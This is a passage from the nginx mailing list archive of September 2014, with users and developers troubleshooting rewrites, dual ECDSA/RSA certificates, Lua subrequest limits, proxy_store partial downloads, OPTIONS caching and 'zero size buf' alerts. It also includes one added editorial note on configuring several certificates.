rule but this is not working. Can anyone please help us. 
location / {
proxy_pass http://localhost;
}

location wp-login.php?action=lostpassword
rewrite ^(.*) http://recover.geo.com $1 permanent;
}

But login url too (wp-login.php?action=login) is redirecting to recover.geo.com

*We need to redirect only the url wp-login.php?action=lostpassword to other and all other url including wp-login.php?action=login need to proxypass*

Can anyone please help us with the correct configuration.

Thanks
Geo

From rob.stradling at comodo.com Thu Sep 18 14:29:53 2014
From: rob.stradling at comodo.com (Rob Stradling)
Date: Thu, 18 Sep 2014 15:29:53 +0100
Subject: 2 certs, 1 domain, 1 IP
In-Reply-To: <5419A60F.9020707@riseup.net>
References: <54184F09.6090205@riseup.net> <5419A60F.9020707@riseup.net>
Message-ID: <541AEC61.2040804@comodo.com>

On 17/09/14 16:17, shmick at riseup.net wrote:
> it works with postfix
> i guess not in nginx
> feature request ?

Hi. You could try this patch:
http://forum.nginx.org/read.php?29,243797,244306#msg-244306

It's nearly a year old so it may well need tweaking to make it apply cleanly to the latest Nginx code. I'm afraid I don't know when I'm going to find time to get it into a suitable state for the Nginx team to be happy to properly review it and (hopefully) commit it. (So if anybody else wants to take over, please be my guest).

> nginx: [emerg] "ssl_certificate" directive is duplicate in
> /etc/nginx.conf:53
> nginx: configuration file /etc/nginx.conf test failed
>
> shmick at riseup.net wrote:
>> is it possible with SNI and nginx to have both an ECDSA and RSA cert
>> serving 1 website on 1 IP ?
>>
>> best practices ?
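[Editorial note, hedged: the "ssl_certificate directive is duplicate" error quoted here is exactly what later nginx releases removed; since nginx 1.11.0, ssl_certificate and ssl_certificate_key may be specified multiple times with certificates of different key types in one server block. A minimal sketch; the server name and file paths are placeholders.]

```nginx
server {
    listen 443 ssl;
    server_name www.example.com;  # placeholder

    # RSA certificate chain + key
    ssl_certificate     /etc/nginx/ssl/example-rsa.crt;
    ssl_certificate_key /etc/nginx/ssl/example-rsa.key;

    # ECDSA certificate chain + key; nginx selects it when the
    # negotiated cipher suite uses ECDSA authentication.
    ssl_certificate     /etc/nginx/ssl/example-ecdsa.crt;
    ssl_certificate_key /etc/nginx/ssl/example-ecdsa.key;
}
```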
-- Rob Stradling Senior Research & Development Scientist COMODO - Creating Trust Online From nginx-forum at nginx.us Thu Sep 18 16:02:57 2014 From: nginx-forum at nginx.us (jpsonweb) Date: Thu, 18 Sep 2014 12:02:57 -0400 Subject: using location.capture to post a form In-Reply-To: References: Message-ID: <708f2d52447ea98d97ed0a96741ede4a.NginxMailingListEnglish@forum.nginx.org> Thank you Yichun, I was able to post the parameter from nginx by passing the arguments using this. local maken_res = ngx.location.capture("/test", { method = ngx.HTTP_POST, args = { pagelayout = dev_res_encoded }}); This works only when post parameter size is less than 81568 characters. When the parameter size is greater than 81568, we get error 502. is there any way to get around this limitation or is there a different way to post more than 81568 characters. Jyoti Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253311,253393#msg-253393 From agentzh at gmail.com Thu Sep 18 17:14:22 2014 From: agentzh at gmail.com (Yichun Zhang (agentzh)) Date: Thu, 18 Sep 2014 10:14:22 -0700 Subject: using location.capture to post a form In-Reply-To: <708f2d52447ea98d97ed0a96741ede4a.NginxMailingListEnglish@forum.nginx.org> References: <708f2d52447ea98d97ed0a96741ede4a.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hello! On Thu, Sep 18, 2014 at 9:02 AM, jpsonweb wrote: > I was able to post the parameter from nginx by passing the arguments using > this. > local maken_res = ngx.location.capture("/test", { method = ngx.HTTP_POST, > args = { pagelayout = dev_res_encoded }}); > You're passing your args via URI arguments rather than POST body. See https://github.com/openresty/lua-nginx-module#ngxlocationcapture "* args specify the subrequest's URI query arguments (both string value and Lua tables are accepted) " > This works only when post parameter size is less than 81568 characters. When > the parameter size is greater than 81568, we get error 502. 
> Apparently you're hitting the URL length limit on your backend server. BTW, it's better to post such questions to the openresty-en mailing list instead: https://groups.google.com/group/openresty-en Regards, -agentzh From shahzaib.cb at gmail.com Thu Sep 18 17:58:13 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 18 Sep 2014 22:58:13 +0500 Subject: Proxy_store downloading half videos !! In-Reply-To: References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> Message-ID: This issue is fixed, now i am getting another issue. Whenever user requests for new file which is not yet downloaded on the edge server, user gets the 403 forbidden error on browser and on refreshing the browser, the same video started to stream as well as download. Why the proxy_store is showing 403 error on first time ? On Thu, Sep 18, 2014 at 6:45 PM, shahzaib shahzaib wrote: > Looks like on using the proxy_pass http://fl008.origin.com:80 > $uri; it worked . Could :80 be the issue ? > > On Thu, Sep 18, 2014 at 6:43 PM, shahzaib shahzaib > wrote: > >> >>proxy_pass http://fl008.origin.com$uri; >> It didn't work instead the error 502 gateway started to show up when >> proxying the request via proxy_pass. >> >> On Thu, Sep 18, 2014 at 6:32 PM, shahzaib shahzaib > > wrote: >> >>> Thanks a lot for the solution Roman, i'll get back to you after applying >>> the fix. :-) >>> >>> On Thu, Sep 18, 2014 at 6:29 PM, Roman Arutyunyan >>> wrote: >>> >>>> >>>> Try this directive instead of yours to download the entire file from >>>> the backend >>>> >>>> proxy_pass http://fl008.origin.com$uri; >>>> >>>> >>>> On 18 Sep 2014, at 15:25, shahzaib shahzaib >>>> wrote: >>>> >>>> > Yes, the mp4 modules is enabled on origin as well as edge. Could you >>>> please help me resolving the issue ? 
>>>> > >>>> > On Thu, Sep 18, 2014 at 4:21 PM, Roman Arutyunyan >>>> wrote: >>>> > >>>> > On 18 Sep 2014, at 14:49, shahzaib shahzaib >>>> wrote: >>>> > >>>> > > Hi, >>>> > > >>>> > > We're using proxy_store on the edge server for replicating >>>> requested mp4 files and some of our users reported that some of the videos >>>> are half sized and therefore they are unable to stream whole video file on >>>> their end (coming from the edge server). On digging into the access_logs of >>>> nginx, i found the 500 internal server errors for 10~20 videos and on >>>> checking the size of 500 error videos it was half of the size compare to >>>> the mirrored video files on the origin. Please check the following error of >>>> the culprit video link :- >>>> > > >>>> > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET >>>> /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 >>>> 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 >>>> (compatible; MSIE 8.0; Windows NT 6.0)" >>>> > > >>>> > > I'd like to inform that the issue is coming for 40% of the videos. >>>> > > >>>> > > error_log :- >>>> > > >>>> > > 2014/09/18 15:30:40 [error] 3883#0: *77490 >>>> "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start >>>> time exceeds file duration, client: 175.110.88.213, server: >>>> lw3.files.com, request: "GET >>>> /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 HTTP/1.1" >>>> > > >>>> > > You can see the "start time exceeds error" on edge server but the >>>> video link starting from start=736.8 exists on origin server. 
>>>> > > >>>> > > Nginx config :- >>>> > > >>>> > > server { >>>> > > >>>> > > listen 80; >>>> > > server_name lw3.files.com; >>>> > > root /var/www/html/tunefiles; >>>> > > location ~ \.(mp4|jpeg|jpg)$ { >>>> > > root /var/www/html/tunefiles; >>>> > > mp4; >>>> > > error_page 404 = @fetch; >>>> > > >>>> > > } >>>> > > >>>> > > >>>> > > location ~ \.(php)$ { >>>> > > proxy_pass http://fl008.files.net:80; >>>> > > } >>>> > > >>>> > > >>>> > > >>>> > > location @fetch { >>>> > > internal; >>>> > > proxy_pass http://fl008.origin.com:80; >>>> > > proxy_store on; >>>> > > proxy_store_access user:rw group:rw all:r; >>>> > > root /var/www/html/tunefiles; >>>> > > } >>>> > >>>> > Do you have the mp4 module enabled at the origin? If so then you >>>> have partial mp4 >>>> > downloaded from there and stored locally. Note proxy_pass without >>>> URI passes >>>> > client URIs to the origin keeping the arguments (including "start"). >>>> > >>>> > _______________________________________________ >>>> > nginx mailing list >>>> > nginx at nginx.org >>>> > http://mailman.nginx.org/mailman/listinfo/nginx >>>> > >>>> > _______________________________________________ >>>> > nginx mailing list >>>> > nginx at nginx.org >>>> > http://mailman.nginx.org/mailman/listinfo/nginx >>>> >>>> _______________________________________________ >>>> nginx mailing list >>>> nginx at nginx.org >>>> http://mailman.nginx.org/mailman/listinfo/nginx >>>> >>> >>> >> > -------------- next part -------------- An HTML attachment was scrubbed... URL: From eliezer at ngtech.co.il Fri Sep 19 00:29:28 2014 From: eliezer at ngtech.co.il (Eliezer Croitoru) Date: Fri, 19 Sep 2014 03:29:28 +0300 Subject: Proxy_store downloading half videos !!
In-Reply-To: References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> Message-ID: <541B78E8.1020504@ngtech.co.il> I have seen your directives and I am not an nginx expert, but there is something like "try" for connections to a proxy server that will first try one direction and, if it cannot download from there, use the other one. Take a peek here: http://forum.nginx.org/read.php?2,246125,246125 You can define two backends: store and proxy. First try store and then proxy. (I do hope I am right about the assumption) Eliezer On 09/18/2014 08:58 PM, shahzaib shahzaib wrote: > This issue is fixed, now i am getting another issue. Whenever user > requests for new file which is not yet downloaded on the edge server, > user gets the 403 forbidden error on browser and on refreshing the > browser, the same video started to stream as well as download. Why the > proxy_store is showing 403 error on first time ? > From nginx-forum at nginx.us Fri Sep 19 00:45:32 2014 From: nginx-forum at nginx.us (idabic) Date: Thu, 18 Sep 2014 20:45:32 -0400 Subject: Proxy_cache_methods and OPTIONS Message-ID: I have bounced around quite a lot through forums and documentation trying to determine whether the OPTIONS request method is honoured/allowed by nginx when it is configured as a reverse proxy cache or not. I used a test box with nginx 1.4.6 with "proxy_cache_methods GET OPTIONS;" to test a certain use case for a client, but reloading nginx returned the obvious exception: "invalid value "OPTIONS" in /etc/nginx/sites-enabled/default:35" The documentation says: ============================================= Syntax: proxy_cache_methods GET | HEAD | POST ...; Default: proxy_cache_methods GET HEAD; Context: http, server, location ============================================= but I don't see 1. a full list and 2. a list of the methods allowed when proxy_cache is configured - if that makes a difference. Any thoughts?
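The documentation excerpt quoted above means each listed method must be one of GET, HEAD, or POST, and GET and HEAD are cached implicitly even when not listed. A minimal sketch of a configuration that passes the configuration test (the cache zone, paths, and upstream name are placeholders, not from the original setup):

```nginx
# Sketch only: zone name, paths, and backend are illustrative placeholders.
http {
    proxy_cache_path /var/cache/nginx/demo keys_zone=demo:10m;

    server {
        listen 8080;

        location / {
            proxy_cache demo;
            # Only GET | HEAD | POST are accepted here; GET and HEAD are
            # always cached even if omitted from the list. A line such as
            # "proxy_cache_methods GET OPTIONS;" fails "nginx -t" with
            # the "invalid value" error quoted above.
            proxy_cache_methods GET HEAD POST;
            proxy_pass http://backend.example.com;
        }
    }
}
```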
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253403,253403#msg-253403 From nginx-forum at nginx.us Fri Sep 19 04:00:14 2014 From: nginx-forum at nginx.us (geopcgeo) Date: Fri, 19 Sep 2014 00:00:14 -0400 Subject: Redirect to a different url based on a query. In-Reply-To: References: Message-ID: Can anyone please help me on it.... Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253390,253405#msg-253405 From shahzaib.cb at gmail.com Fri Sep 19 06:07:32 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Fri, 19 Sep 2014 11:07:32 +0500 Subject: Proxy_store downloading half videos !! In-Reply-To: <541B78E8.1020504@ngtech.co.il> References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> <541B78E8.1020504@ngtech.co.il> Message-ID: 403 forbidden error was due to hotlinking protection on the origin server. It was fixed. On Fri, Sep 19, 2014 at 5:29 AM, Eliezer Croitoru wrote: > I have seen your directives and I am not nginx expert but there was > something like "try" for connections to a proxy server that will first try > one direction and if not able to download from there use the other one. > > Take a peak here: > http://forum.nginx.org/read.php?2,246125,246125 > > You can define two backends: store and proxy. > First try store and then proxy. > (I do hope I am right about the assumption) > > Eliezer > > On 09/18/2014 08:58 PM, shahzaib shahzaib wrote: > >> This issue is fixed, now i am getting another issue. Whenever user >> requests for new file which is not yet downloaded on the edge server, >> user gets the 403 forbidden error on browser and on refreshing the >> browser, the same video started to stream as well as download. Why the >> proxy_store is showing 403 error on first time ? >> >> > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From mdounin at mdounin.ru Fri Sep 19 07:41:07 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Fri, 19 Sep 2014 11:41:07 +0400 Subject: Proxy_cache_methods and OPTIONS In-Reply-To: References: Message-ID: <20140919074107.GT91749@mdounin.ru> Hello! On Thu, Sep 18, 2014 at 08:45:32PM -0400, idabic wrote: > I have bounced around quite a lot through forums and documentation to > demistique whether the OPTIONS request method is honoured/allowed by nginx > when it's configured as reverse proxy cache system or not. > I used a test box with nginx 1.4.6 with > > "proxy_cache_methods GET OPTIONS;" > > to test certain use case for a client but, reloading nginx returned obvious > exception that: > > "invalid value "OPTIONS" in /etc/nginx/sites-enabled/default:35" > > Documentation says: > ============================================= > Syntax: proxy_cache_methods GET | HEAD | POST ...; > Default: > > proxy_cache_methods GET HEAD; > > Context: http, server, location > ============================================= > > but I dont' see 1. full list and 2. list of allowed methods when proxy_cache > is configured - if it makes the difference. The syntax provided means that only the GET, HEAD, or POST methods can be specified, and there may be more than one method. As you can see, as of now OPTIONS can't be specified in proxy_cache_methods, and responses to OPTIONS requests will not be cached. This is in line with what RFC 2616 says about OPTIONS, http://tools.ietf.org/html/rfc2616#section-9.2: Responses to this method are not cacheable. As well as recent RFC 7231, http://tools.ietf.org/html/rfc7231#section-4.3.7: Responses to the OPTIONS method are not cacheable. On the other hand, it should be easy enough to modify the code to allow caching of OPTIONS requests. -- Maxim Dounin http://nginx.org/ From arut at nginx.com Fri Sep 19 10:42:26 2014 From: arut at nginx.com (Roman Arutyunyan) Date: Fri, 19 Sep 2014 14:42:26 +0400 Subject: zero size buf in output !!
In-Reply-To: References: <20140827171624.GX1849@mdounin.ru> Message-ID: Will this error appear if you try this request again? On 17 Sep 2014, at 16:29, shahzaib shahzaib wrote: > Well, i again received the same error but its much improvement in time frame. If the error was occurring after each 5min, now the same error is occurring after 30~50min. > > The conclusion is, nginx-1.7.4 is not 100% bug free from this issue. > > 2014/09/17 17:22:48 [alert] 28559#0: *27961 zero size buf in output t:0 r:0 f:0 000000000477EE20 000000000477EE20-000000000477FE20 0000000000000000 0-0 while sending to client, client: 115.167.75.22, server: ldx.files.com, request: "GET /files/videos/2014/09/04/140984890338bc7-240.mp4 HTTP/1.1", > > [root at tw data]# nginx -V > nginx version: nginx/1.7.4 > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx --group=nginx --with-http_flv_module --with-http_mp4_module > You have mail in /var/spool/mail/root > > > Regards. > Shahzaib > > On Wed, Sep 17, 2014 at 4:25 PM, shahzaib shahzaib wrote: > Hi Maxim, > > Upgraded nginx to 1.7.4 and looks like the issue is gone. > > Regards. > Shahzaib > > > On Wed, Aug 27, 2014 at 10:16 PM, Maxim Dounin wrote: > Hello! > > On Wed, Aug 27, 2014 at 08:48:19PM +0500, shahzaib shahzaib wrote: > > > We're facing following error on edge server with nginx-1.6.1, using > > proxy_store on edge. 
> > > > 2014/08/27 20:35:05 [alert] 5701#0: *21244 zero size buf in output t:0 r:0 > > f:0 0000000002579840 0000000002579840-000000000257A840 0000000000000000 0-0 > > while sending to client, client: 119.160.118.123, server: > > storage4.content.com, request: "GET > > /files/videos/2013/06/30/137256108550d07-m.mp4 HTTP/1.1", upstream: " > > http://82.2.37.87:80/files/videos/2013/06/30/137256108550d07-m.mp4", host: " > > storage4.content.com" > > 2014/08/27 20:35:28 [alert] 5687#0: *26261 zero size buf in output t:0 r:0 > > f:0 0000000004F5F2D0 0000000004F5F2D0-0000000004F602D0 0000000000000000 0-0 > > while sending to client, client: 121.52.147.68, server: storage9.content.com, > > request: "GET /files/videos/2014/04/21/1398060531bb2e3-360.mp4 HTTP/1.1", > > upstream: " > > http://9.7.248.180:80/files/videos/2014/04/21/1398060531bb2e3-360.mp4", > > host: "storage9.content.com", referrer: " > > http://files.com/video/2618018/aashiqui-3-new-songs" > > > > nginx version: nginx/1.6.1 > > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) > > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx > > --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log > > --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid > > --lock-path=/var/run/nginx.lock > > --http-client-body-temp-path=/var/cache/nginx/client_temp > > --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx > > --group=nginx --with-http_flv_module --with-http_mp4_module > > You may want to try 1.7.4 to see if it helps (there are some > potentially related changes in nginx 1.7.3). > > If it doesn't, providing debug log may be helpful. See > http://wiki.nginx.org/Debugging for more hints. 
> > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From shahzaib.cb at gmail.com Fri Sep 19 10:46:48 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Fri, 19 Sep 2014 15:46:48 +0500 Subject: zero size buf in output !! In-Reply-To: References: <20140827171624.GX1849@mdounin.ru> Message-ID: Nope, it doesn't !! On Fri, Sep 19, 2014 at 3:42 PM, Roman Arutyunyan wrote: > Will this error appear if you try this request again? > > On 17 Sep 2014, at 16:29, shahzaib shahzaib wrote: > > > Well, i again received the same error but its much improvement in time > frame. If the error was occurring after each 5min, now the same error is > occurring after 30~50min. > > > > The conclusion is, nginx-1.7.4 is not 100% bug free from this issue. > > > > 2014/09/17 17:22:48 [alert] 28559#0: *27961 zero size buf in output t:0 > r:0 f:0 000000000477EE20 000000000477EE20-000000000477FE20 0000000000000000 > 0-0 while sending to client, client: 115.167.75.22, server: ldx.files.com, > request: "GET /files/videos/2014/09/04/140984890338bc7-240.mp4 HTTP/1.1", > > > > [root at tw data]# nginx -V > > nginx version: nginx/1.7.4 > > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) > > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx > --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log > --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid > --lock-path=/var/run/nginx.lock > --http-client-body-temp-path=/var/cache/nginx/client_temp > --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx > --group=nginx --with-http_flv_module --with-http_mp4_module > > You have mail in /var/spool/mail/root > > > > > > Regards. 
> > Shahzaib > > > > On Wed, Sep 17, 2014 at 4:25 PM, shahzaib shahzaib < > shahzaib.cb at gmail.com> wrote: > > Hi Maxim, > > > > Upgraded nginx to 1.7.4 and looks like the issue is gone. > > > > Regards. > > Shahzaib > > > > > > On Wed, Aug 27, 2014 at 10:16 PM, Maxim Dounin > wrote: > > Hello! > > > > On Wed, Aug 27, 2014 at 08:48:19PM +0500, shahzaib shahzaib wrote: > > > > > We're facing following error on edge server with nginx-1.6.1, using > > > proxy_store on edge. > > > > > > 2014/08/27 20:35:05 [alert] 5701#0: *21244 zero size buf in output t:0 > r:0 > > > f:0 0000000002579840 0000000002579840-000000000257A840 > 0000000000000000 0-0 > > > while sending to client, client: 119.160.118.123, server: > > > storage4.content.com, request: "GET > > > /files/videos/2013/06/30/137256108550d07-m.mp4 HTTP/1.1", upstream: " > > > http://82.2.37.87:80/files/videos/2013/06/30/137256108550d07-m.mp4", > host: " > > > storage4.content.com" > > > 2014/08/27 20:35:28 [alert] 5687#0: *26261 zero size buf in output t:0 > r:0 > > > f:0 0000000004F5F2D0 0000000004F5F2D0-0000000004F602D0 > 0000000000000000 0-0 > > > while sending to client, client: 121.52.147.68, server: > storage9.content.com, > > > request: "GET /files/videos/2014/04/21/1398060531bb2e3-360.mp4 > HTTP/1.1", > > > upstream: " > > > http://9.7.248.180:80/files/videos/2014/04/21/1398060531bb2e3-360.mp4 > ", > > > host: "storage9.content.com", referrer: " > > > http://files.com/video/2618018/aashiqui-3-new-songs" > > > > > > nginx version: nginx/1.6.1 > > > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) > > > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx > > > --conf-path=/etc/nginx/nginx.conf > --error-log-path=/var/log/nginx/error.log > > > --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid > > > --lock-path=/var/run/nginx.lock > > > --http-client-body-temp-path=/var/cache/nginx/client_temp > > > --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx > > > 
--group=nginx --with-http_flv_module --with-http_mp4_module > > > > You may want to try 1.7.4 to see if it helps (there are some > > potentially related changes in nginx 1.7.3). > > > > If it doesn't, providing debug log may be helpful. See > > http://wiki.nginx.org/Debugging for more hints. > > > > -- > > Maxim Dounin > > http://nginx.org/ > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From shmick at riseup.net Fri Sep 19 13:14:00 2014 From: shmick at riseup.net (shmick at riseup.net) Date: Fri, 19 Sep 2014 23:14:00 +1000 Subject: 2 certs, 1 domain, 1 IP In-Reply-To: <541AEC61.2040804@comodo.com> References: <54184F09.6090205@riseup.net> <5419A60F.9020707@riseup.net> <541AEC61.2040804@comodo.com> Message-ID: <541C2C18.9050102@riseup.net> hi rob, Rob Stradling wrote: > On 17/09/14 16:17, shmick at riseup.net wrote: >> it works with postfix >> i guess not in nginx >> feature request ? > > Hi. You could try this patch: > > http://forum.nginx.org/read.php?29,243797,244306#msg-244306 many thanks sorry but am i missing something ? i cant find where to download the patch on the page either as attachment or text ? > > It's nearly a year old so it may well need tweaking to make it apply > cleanly to the latest Nginx code. I'm afraid I don't know when I'm > going to find time to get it into a suitable state for the Nginx team to > be happy to properly review it and (hopefully) commit it. (So if > anybody else wants to take over, please be my guest). 
> >>> nginx: [emerg] "ssl_certificate" directive is duplicate in >>> /etc/nginx.conf:53 >>> nginx: configuration file /etc/nginx.conf test failed >>> >>> shmick at riseup.net wrote: >>>> is it possible with SNI and nginx to have both an ECDSA and RSA cert >>>> serving 1 website on 1 IP ? >>>> >>>> best practices ? > From nginx-forum at nginx.us Fri Sep 19 14:13:39 2014 From: nginx-forum at nginx.us (igorhmm) Date: Fri, 19 Sep 2014 10:13:39 -0400 Subject: Worker processes not shutting down In-Reply-To: <8b582656c938132d5f99e41e8aaa817d.NginxMailingListEnglish@forum.nginx.org> References: <8b582656c938132d5f99e41e8aaa817d.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hi, Did you solve that problem? I'm having the same issue with nginx/1.4.3. Could it be related to websockets that are still connected? Some browsers can't connect until that worker is killed? Does this happen for you too? Thanks Posted at Nginx Forum: http://forum.nginx.org/read.php?2,221591,253418#msg-253418 From rob.stradling at comodo.com Fri Sep 19 14:20:02 2014 From: rob.stradling at comodo.com (Rob Stradling) Date: Fri, 19 Sep 2014 15:20:02 +0100 Subject: 2 certs, 1 domain, 1 IP In-Reply-To: <541C2C18.9050102@riseup.net> References: <54184F09.6090205@riseup.net> <5419A60F.9020707@riseup.net> <541AEC61.2040804@comodo.com> <541C2C18.9050102@riseup.net> Message-ID: <541C3B92.3040707@comodo.com> On 19/09/14 14:14, shmick at riseup.net wrote: > hi rob, > > Rob Stradling wrote: >> On 17/09/14 16:17, shmick at riseup.net wrote: >>> it works with postfix >>> i guess not in nginx >>> feature request ? >> >> Hi. You could try this patch: >> >> http://forum.nginx.org/read.php?29,243797,244306#msg-244306 > > many thanks > sorry but am i missing something ? > i can't find where to download the patch on the page, either as attachment > or text ? Hmmm, neither can I. I just forwarded the original post to you. >> It's nearly a year old so it may well need tweaking to make it apply >> cleanly to the latest Nginx code.
I'm afraid I don't know when I'm >> going to find time to get it into a suitable state for the Nginx team to >> be happy to properly review it and (hopefully) commit it. (So if >> anybody else wants to take over, please be my guest). I've already had one offer of help today. :-) >>> nginx: [emerg] "ssl_certificate" directive is duplicate in >>> /etc/nginx.conf:53 >>> nginx: configuration file /etc/nginx.conf test failed >>> >>> shmick at riseup.net wrote: >>>> is it possible with SNI and nginx to have both an ECDSA and RSA cert >>>> serving 1 website on 1 IP ? >>>> >>>> best practices ? -- Rob Stradling Senior Research & Development Scientist COMODO - Creating Trust Online From vbart at nginx.com Fri Sep 19 14:26:00 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Fri, 19 Sep 2014 18:26 +0400 Subject: 2 certs, 1 domain, 1 IP In-Reply-To: <541C3B92.3040707@comodo.com> References: <54184F09.6090205@riseup.net> <541C2C18.9050102@riseup.net> <541C3B92.3040707@comodo.com> Message-ID: <2751037.b4aYs8kZ6I@vbart-laptop> On Friday 19 September 2014 15:20:02 Rob Stradling wrote: > On 19/09/14 14:14, shmick at riseup.net wrote: > > hi rob, > > > > Rob Stradling wrote: > >> On 17/09/14 16:17, shmick at riseup.net wrote: > >>> it works with postfix > >>> i guess not in nginx > >>> feature request ? > >> > >> Hi. You could try this patch: > >> > >> http://forum.nginx.org/read.php?29,243797,244306#msg-244306 > > > > many thanks > > sorry but am i missing something ? > > i cant find where to download the patch on the page either as attachment > > or text ? > > Hmmm, neither can I. > > I just forwarded the original post to you. http://mailman.nginx.org/pipermail/nginx-devel/2013-October/004474.html wbr, Valentin V. Bartenev From arut at nginx.com Fri Sep 19 14:46:11 2014 From: arut at nginx.com (Roman Arutyunyan) Date: Fri, 19 Sep 2014 18:46:11 +0400 Subject: zero size buf in output !! 
In-Reply-To: References: <20140827171624.GX1849@mdounin.ru> Message-ID: Can you figure out when the error appears? Maybe it appears when the file is downloaded from backend and written to cache (if you have one) or when serving from cache etc. On 19 Sep 2014, at 14:46, shahzaib shahzaib wrote: > Nope, it doesn't !! > > On Fri, Sep 19, 2014 at 3:42 PM, Roman Arutyunyan wrote: > Will this error appear if you try this request again? > > On 17 Sep 2014, at 16:29, shahzaib shahzaib wrote: > > > Well, i again received the same error but its much improvement in time frame. If the error was occurring after each 5min, now the same error is occurring after 30~50min. > > > > The conclusion is, nginx-1.7.4 is not 100% bug free from this issue. > > > > 2014/09/17 17:22:48 [alert] 28559#0: *27961 zero size buf in output t:0 r:0 f:0 000000000477EE20 000000000477EE20-000000000477FE20 0000000000000000 0-0 while sending to client, client: 115.167.75.22, server: ldx.files.com, request: "GET /files/videos/2014/09/04/140984890338bc7-240.mp4 HTTP/1.1", > > > > [root at tw data]# nginx -V > > nginx version: nginx/1.7.4 > > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) > > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx --group=nginx --with-http_flv_module --with-http_mp4_module > > You have mail in /var/spool/mail/root > > > > > > Regards. > > Shahzaib > > > > On Wed, Sep 17, 2014 at 4:25 PM, shahzaib shahzaib wrote: > > Hi Maxim, > > > > Upgraded nginx to 1.7.4 and looks like the issue is gone. > > > > Regards. > > Shahzaib > > > > > > On Wed, Aug 27, 2014 at 10:16 PM, Maxim Dounin wrote: > > Hello! 
> > > > On Wed, Aug 27, 2014 at 08:48:19PM +0500, shahzaib shahzaib wrote: > > > > > We're facing following error on edge server with nginx-1.6.1, using > > > proxy_store on edge. > > > > > > 2014/08/27 20:35:05 [alert] 5701#0: *21244 zero size buf in output t:0 r:0 > > > f:0 0000000002579840 0000000002579840-000000000257A840 0000000000000000 0-0 > > > while sending to client, client: 119.160.118.123, server: > > > storage4.content.com, request: "GET > > > /files/videos/2013/06/30/137256108550d07-m.mp4 HTTP/1.1", upstream: " > > > http://82.2.37.87:80/files/videos/2013/06/30/137256108550d07-m.mp4", host: " > > > storage4.content.com" > > > 2014/08/27 20:35:28 [alert] 5687#0: *26261 zero size buf in output t:0 r:0 > > > f:0 0000000004F5F2D0 0000000004F5F2D0-0000000004F602D0 0000000000000000 0-0 > > > while sending to client, client: 121.52.147.68, server: storage9.content.com, > > > request: "GET /files/videos/2014/04/21/1398060531bb2e3-360.mp4 HTTP/1.1", > > > upstream: " > > > http://9.7.248.180:80/files/videos/2014/04/21/1398060531bb2e3-360.mp4", > > > host: "storage9.content.com", referrer: " > > > http://files.com/video/2618018/aashiqui-3-new-songs" > > > > > > nginx version: nginx/1.6.1 > > > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) > > > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx > > > --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log > > > --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid > > > --lock-path=/var/run/nginx.lock > > > 